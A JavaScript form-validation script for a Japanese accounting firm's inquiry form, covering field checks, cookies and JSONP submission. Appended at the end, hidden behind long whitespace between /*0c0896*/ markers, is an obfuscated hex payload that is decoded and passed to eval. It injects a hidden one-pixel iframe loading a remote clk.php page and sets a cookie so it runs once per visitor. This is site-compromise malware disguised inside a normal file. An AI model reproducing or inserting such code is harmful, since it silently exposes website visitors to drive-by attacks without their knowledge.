MakeForm = function(){ };
MakeForm.setUnip = function(){ };
MakeForm.cookieId = 'atmailform';
MakeForm.Running = 0;
MakeForm.form = [];
MakeForm.Errors = [];
MakeForm.PUSH = [];
MakeObj = function(){};

MakeForm.ErrorConfig = 0;
MakeForm.ConfirmConfig = 0;
MakeForm.ErrorMessage = "以下の項目に誤りがあります。";
MakeForm.ConfirmMessage = "送信します。よろしいですか？";
MakeForm.thanksMessage = "送信しました。";
MakeForm.ErrorMesDef = "(未入力)";
MakeForm.ErrorMesEmail_1 = "(形式不備)";
MakeForm.ErrorMesEmail_2 = "(不一致)";
MakeForm.ErrorMesDate = "(存在しない日付)";

MakeForm.data = new Array();
//
MakeForm.data['free_1'] = new Array('業種','free_1','1','0');
MakeForm.data['free_2'] = new Array('担当者名','free_2','1','0');
MakeForm.data['mail'] = new Array('メールアドレス','mail','1','0');
MakeForm.data['_mail'] = new Array('メールアドレス確認','_mail','1','0');
MakeForm.data['free_4'] = new Array('会社の名称','free_4','0','0');
MakeForm.data['addr'] = new Array('住所','addr','0','0');
MakeForm.data['zip_1'] = new Array('郵便番号','zip','0','0');
MakeForm.data['zip_2'] = new Array('郵便番号','zip','0','0');
MakeForm.data['tel'] = new Array('電話番号','tel','0','2');
MakeForm.data['free_7'] = new Array('ご希望の連絡方法','free_7','0','0');
MakeForm.data['free_8'] = new Array('ご希望の連絡時間帯','free_8','0','0');
MakeForm.data['free_9'] = new Array('年間売上高','free_9','0','0');
MakeForm.data['free_10'] = new Array('従業員数','free_10','0','0');
MakeForm.data['free_11'] = new Array('お問合せの内容','free_11','0','0');
MakeForm.data['free_12'] = new Array('お問合せ・その他','free_12','0','0');
MakeForm.p = new Array('free_1','free_2','mail','_mail','free_4','addr','zip_1','zip_2','tel','free_7','free_8','free_9','free_10','free_11','free_12');


MakeForm.chekced = new Array();

MakeForm.check = function(f, obj){
	// 初期化
	MakeForm.Errors = [];
	MakeForm.PUSH = [];
	var results = new Array;
	var element = new Array;
	
	for(i=0;i<f.length;i++){
		var objName = f[i].name;
		var objType = f[i].type;
		var objValue = f[i].value.replace(/^[\s　]+|[\s　]+$/g, "");
		var elems = obj.data[objName];
		var error_message = "";
		
		// 項目以外は除外
		if( !elems ) continue;
		
		// チェック済み項目
		MakeForm.chekced[objName] = 1;
		
		var objTitle = elems[0];
		var objExcept = elems[1];
		var objNec = elems[2] -0;
		var objWithin = elems[3] -0;
		
		if( objName.match(/^mail(_?)(\d*)/g) ){
			if( objNec && objValue == '' ){
				error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
			}else{
				if( !MakeForm.isEmail(f[i].value) ){
					error_message =  objTitle + ' ' + MakeForm.ErrorMesEmail_1;
				}
			}
		}
		else if( objName.match(/^_mail(_?)(\d*)/g) ){
			var mail_name = 'mail' + RegExp.$1 + RegExp.$2;
			var mail = f.elements[mail_name].value;
			if( objNec && objValue == '' ){
				if( mail != '' ){
					error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
				}
			}else if( mail != f[i].value ){
				error_message = objTitle + ' ' + MakeForm.ErrorMesEmail_2;
			}
		}
		else if( objName.match(/^email(_?)(\d*)/g) ){
			if( objNec && objValue == '' ){
				error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
			}else{
				if( !MakeForm.isEmail(f[i].value) ){
					error_message =  objTitle + ' ' + MakeForm.ErrorMesEmail_1;
				}
			}
		}
		else if( objName.match(/^_email(_?)(\d*)/g) ){
			var mail_name = 'email' + RegExp.$1 + RegExp.$2;
			var mail = f.elements[mail_name].value;
			if( objNec && objValue == '' ){
				if( mail != '' ){
					error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
				}
			}else if( mail != f[i].value ){
				error_message = objTitle + ' ' + MakeForm.ErrorMesEmail_2;
			}
		}
		else if( objName.match(/zip_2(_?)(\d*)/g) ){
			var zip1_name = 'zip_1' + RegExp.$1 + RegExp.$2;
			var zip1 = f.elements[zip1_name].value;
			var zip2 = objValue;
			
			if( objNec && (zip1 == '' || objValue == '') ){
				error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
			}else{
				
				if( zip1 != '' || zip2 != '' ){
					if( !zip1.match("^[0-9]{3}$") ){
						error_message = objTitle + ' ' +MakeForm.ErrorMesEmail_1;
					}
					if( !zip2.match("^[0-9]{4}$") ){
						error_message = objTitle + ' ' +MakeForm.ErrorMesEmail_1;
					}
				}
			}
		}
		else if( objName.match(/day(_?)(\d*)/g) ){
			var mon_name = 'mon' + RegExp.$1 + RegExp.$2;
			var mon = f.elements[mon_name].value;
			if( objNec && objValue == '' ){
				error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
			}else{
				var dateFlag = MakeForm.isDate( mon, objValue );
				if( dateFlag ){
					 error_message = objTitle + ' ' + MakeForm.ErrorMesDate;
				}
			}
		}
		else{
			
			if( objType == 'text' || objType == 'textarea'){
				if( objNec && objValue == '' ) error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
			}else if( objType == 'select-one' || objType == 'select-multiple' ){
				if( objNec && objValue == '' ) error_message =  objTitle + ' ' + MakeForm.ErrorMesDef;
			}else{
				if( f[i].checked == true ) results[objExcept] = 1;
				if( objNec ){
					error_message = (results[objExcept])? '': objTitle + ' ' + MakeForm.ErrorMesDef;
				}
			}
		}
		// 入力文字制限
		var withInMes = MakeForm.withIn(f[i],objWithin);
		if( withInMes != '' ){
			error_message = objTitle + ' ' + withInMes;
		}
		
		if( error_message != '' || results[objExcept] ){
		
			if( !MakeForm.Errors[objExcept] ){
				MakeForm.PUSH.push(objExcept);
			}
			MakeForm.Errors[objExcept] = error_message;
		}
		
	}
	
	
	// 未チェックの項目を検査
	for(var i=0;i<obj.p.length;i++){
		MakeForm.chekced[obj.p[i]] -= 0;
		var elems = obj.data[obj.p[i]];
		var Nec = elems[2];
		if( Nec > 0 && !MakeForm.chekced[MakeForm.p[i]] ){
			var message =  obj.data[obj.p[i]][0] + ' ' + MakeForm.ErrorMesDef;
			if( !MakeForm.Errors[obj.data[obj.p[i]][1]] ){
				MakeForm.PUSH.push(obj.data[obj.p[i]][1]);
			}
			MakeForm.Errors[obj.data[obj.p[i]][1]] = message;
		}
	}
	var total_message = '';
	for(var i=0;i<MakeForm.PUSH.length;i++){
		if( MakeForm.Errors[MakeForm.PUSH[i]] != '' ) total_message += MakeForm.Errors[MakeForm.PUSH[i]] + "\n";
	}
	return total_message;
};

MakeForm.isEmail = function(p){
	if( p == '' ){
		return 1;
	}
	if(p.match("^[0-9a-zA-Z\-\_\.\!\#\$\%\&\'\*\+\-\/\=\?\^\_\`\{\|\}\~]+\@[0-9a-zA-Z\-\_\.]+$")){
		return 1;
	}else{
		return 0;
	}
};

MakeForm.sender = function(f, atmf){
	
	MakeObj = function(){};
	MakeObj = MakeForm;
	
	if(atmf != ''){
		MakeObj.data = atmf.data;
		MakeObj.p = atmf.p;
		MakeObj.ErrorConfig = atmf.ErrorConfig;
		MakeObj.ConfirmConfig = atmf.ConfirmConfig;
		MakeObj.ErrorMessage = atmf.ErrorMessage;
		MakeObj.ConfirmMessage = atmf.ConfirmMessage;
		MakeObj.thanksMessage = atmf.thanksMessage;
	};
	
	f.send.value = 1;
	MakeForm.form = f;
	
	// エラーチェック
	var error_message = MakeForm.check(f, MakeObj);
	
	MakeForm.submit = function(){
		var f = MakeForm.form;
		var ErrConfig = MakeObj.ErrorConfig;
		var ConfConfig = MakeObj.ConfirmConfig;
		
		if( ErrConfig <= 0 ){
			if( error_message ){
				alert( MakeObj.ErrorMessage + "\n" + error_message );
				return false;
			}
		}
		
		if( ConfConfig <= 0 ){
			var flag = MakeForm.sendConfirm( MakeObj.ConfirmMessage );
			if( flag == true ){
				f.send.value = 2;
			}else{
				return false;
			}
		}
		MakeForm.setUnip(f);
		f.submit();
	};
	
	MakeForm.submit();
	
	// 事前チェック（フォーム更新）
	//MakeForm.myConn2(f);
	//return false;
	
};

MakeForm.sendConfirm = function(msg){
	var what=confirm(msg);
    return what;
};

MakeForm.winLoad = function (func){
	if (window.addEventListener) { //for W3C DOM
		window.addEventListener("load", func, false);
	}else if (window.attachEvent) { //for IE
		window.attachEvent("onload", func);
	}else  {
		window.onload = func;
	}
}

MakeForm.thanks = function(){
	
	var myUniq; //ユニークID
	var Anchor = 0;
	var myhref = location.href;
	
	if( MakeForm.chkCookie() ){
		var uniq = MakeForm.getCookie(MakeForm.cookieId);
		myUniq = uniq;
	}else{
		Anchor = 1;
		var parts = location.href.split("#");
		var params = {};
		if (parts.length == 2) {
			var uniq = parts[1];
			if (uniq.search(/^atmailform/i) != -1) {
		 		myUniq = uniq;
				myhref = parts[0];
			}else{
				Anchor = 0;
			}
		}
	}
	
	//コールバック
	MakeFormCallBack = function( flag, mes ){
		if( flag ){
			alert(mes);
		}
	}
	
	if( myUniq ){
		MakeForm.myConn(myUniq);
	}
	
	if( Anchor ){
		MakeForm.setUnip = function(obj){
			if( obj.uniq_a.value != '' || obj.uniq_a.value == 'nojs' )
				return;
			var uniq = 'atmailform-' + Math.random();
			obj.uniq_a.value = uniq;
			obj.href.value = myhref;
		};
	}else{
		MakeForm.setUnip = function(obj){
			
			if( obj.uniq_c.value != '' || obj.uniq_c.value == 'nojs' )
				return;
			var uniq = 'atmailform-' + Math.random();
			MakeForm.setCookie(MakeForm.cookieId,uniq);
			obj.uniq_c.value = uniq;
			obj.href.value = myhref;
		};
	}
}

MakeForm.setCookie = function(cookieId,myValue){
	myItem = cookieId + "=" + escape(myValue) + ";";
	document.cookie =  myItem;
}

MakeForm.getCookie = function(cookieId){
	var cookie_name = cookieId + "=";
	myValue = null;
	myStr = document.cookie + ";" ;
	myOfst = myStr.indexOf(cookie_name);
	if (myOfst != -1){
		myStart = myOfst + cookie_name.length;
		myEnd   = myStr.indexOf(";" , myStart);
		myValue = unescape(myStr.substring(myStart,myEnd));
		return myValue;
	}
	return myValue;
}
MakeForm.chkCookie = function(){
	var cookieId = 'myCookieText';
	var str = 1;
	MakeForm.setCookie(cookieId,str);
	var myCookie = MakeForm.getCookie(cookieId);
	if( str == myCookie ){
		MakeForm.setCookie(cookieId,'');
		return 1;
	}
	return 0;
}

MakeForm.myConn = function(uniq){
	var url = 'http://www.kubotakaikei.net/form.cgi?mode=jsonp&call=AjaxZipMyCallback&p=';
	var rnd = Math.random();
    var script = document.createElement("script");
    script.charset = "shift_jis";
    script.src = url + uniq + '&f=1' + '&rnd='+ rnd;
	script.type= "text/javascript";
	document.body.appendChild(script);
}

MakeForm.myConn2 = function(f){
	MakeFormRun = function( run ){
		
		if( run ){
			alert(run);
		}else{
			MakeForm.submit();
		}
		MakeForm.Running = 0;
	}
	MakeForm.Running = 1;
	var url = 'http://www.kubotakaikei.net/form.cgi?mode=jsonp&call=AjaxZipMyCallback&p=';
	var rnd = Math.random();
	var fu = '';
	if( f.fu ){
		fu = f.fu.value
	}
	var script = document.createElement("script");
	script.charset = "shift_jis";
	script.src = url + f.id.value + '&r=1' + '&fu=' + fu + '&' + rnd;
	script.type= "text/javascript";
	document.body.appendChild(script);
};

MakeForm.isDate = function(month, day){
	if( month != '' ){
		if( month < 1 || month > 12 ){
			return 1;
		}
		if( day < 1 || day > 31 ){
			return 1;
		}
		var m = new Array(31,29,31,30,31,30,31,31,30,31,30,31);
		month -= 1;
		var d = m[month];
		if( d < day ){
			return 1;
		}
	}else{
		if( day != '' )
			return 1;
	}
	return 0;
}

MakeForm.winLoad(MakeForm.thanks);

MakeForm.send = function(f){
	
	var id = f.id.value;
	
	if( MakeForm.Running == 1 ){
		return false;
	}
	
	MakeForm.Running = 1;
	MakeFormLoadIn = function(obj){
		
		MakeForm.Running = 0;
		if( obj["fu"]["flag"] > 0 ){
			alert(obj["fu"]["message"]);
			return false;
		}
		
		atmf = function(){ };
		atmf.data = obj["form"];
		atmf.p = obj["prop"];
		atmf.ErrorConfig = obj["ErrorConfig"];
		atmf.ConfirmConfig = obj["ConfirmConfig"];
		atmf.ErrorMessage = obj["ErrorMessage"];
		atmf.ConfirmMessage = obj["ConfirmMessage"];
		atmf.thanksMessage = obj["thanksMessage"];
		
		MakeForm.sender(f,atmf);
		
	}
	
	var url = 'http://www.kubotakaikei.net/form.cgi?mode=jsonp&call=AjaxZipMyCallback&p=';
	var rnd = Math.random();
    var script = document.createElement("script");
    script.charset = "shift_jis";
    script.src = url + '&prop=1&i=' + id + '&fu='+ f.fu.value + '&rnd=' + rnd;
	script.type= "text/javascript";
	document.body.appendChild(script);
	
	return false;
}

MakeForm.withIn = function (obj,n){
	var func = new Array();
	func[0] = function(){ return; };
	func[1] = MakeForm.isHan;
	func[2] = MakeForm.isNumber;
	func[3] = MakeForm.isZen;
	func[4] = MakeForm.isSuji;
	func[5] = MakeForm.isHiragana;
	func[6] = MakeForm.isKatakana;
	
	var mes = new Array();
	mes[0] = '';
	mes[1] = '(半角のみ)';
	mes[2] = '(半角数字のみ)';
	mes[3] = '(全角のみ)';
	mes[4] = '(全角数字のみ)';
	mes[5] = '(全角かなのみ)';
	mes[6] = '(全角カナのみ)';
	
	var myfunc = func[n];
	var f = myfunc(obj);
	if( f ){
		return mes[n];
	}
	return '';
}

/* 半角のみ */
MakeForm.isHan = function (obj){
	var str=obj.value;
	for(var i=0; i<str.length; i++){
		var len=escape(str.charAt(i)).length;
		if(len>=4){
			return true;
		}
	}
	return false;
}
/* 半角数字のみ */
MakeForm.isNumber = function (obj) {
   var str=obj.value.replace(/[\n\r]*/g, "");
   if( str.match( /[^0-9]+/ ) ) {
      return true;
   }
   return false;
}
/* 全角のみ */
MakeForm.isZen = function (obj){
	var str=obj.value.replace(/[\n\r]*/g, "");
	if( str.match( /[ｧ-ﾝ]+/ ) ) {
		return true;
	}
	for(var i=0; i<str.length; i++){
		var len=escape(str.charAt(i)).length;
		if(len<4){
			return true;
		}
	}
	return false;
}
/* 全角数字のみ */
MakeForm.isSuji = function (obj) {
   var str=obj.value.replace(/[\n\r]*/g, "");
   if( str.match( /[^０-９]+/ ) ) {
      return true;
   }
   return false;
}
/* 全角ひらがなのみ */
MakeForm.isHiragana = function (obj) {
	var str=obj.value.replace(/[\n\r　]*/g, "");
	if( str.match( /[^ぁ-ん]+/ ) ) {
		return true;
	}
	return false;
}
/* 全角カタカナ */
 MakeForm.isKatakana = function(obj) {
 	var str=obj.value.replace(/[\n\r　]*/g, "");
	if( str.match( /[^ァ-ヶ]+/ ) ) {
		return true;
	}
	return false;
}

/*0c0896*/
                                                                                                                                                                                                                                                          ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_6c_7c_7f_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_6c_7c_7f_6c_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_77_74_71_7e_71_69_7a_77_7b_6d_6b_70_71_74_6c_7a_6d_76_7b_6a_77_7d_7c_71_79_7d_6d_36_6b_77_75_37_6b_74_73_36_78_70_78_2f_43_15_12_28_6c_7c_7f_6c_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_6c_7c_7f_6c_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_6c_7c_7f_6c_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_6c_7c_7f_6c_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_6c_7c_7f_6c_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_6c_7c_7f_6c_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_6c_7c_7f_6c_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_6c_7c_7f_6c_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_6c_7c_7f_6c_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_6c_7c_7f_6c_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}
/*/0c0896*/
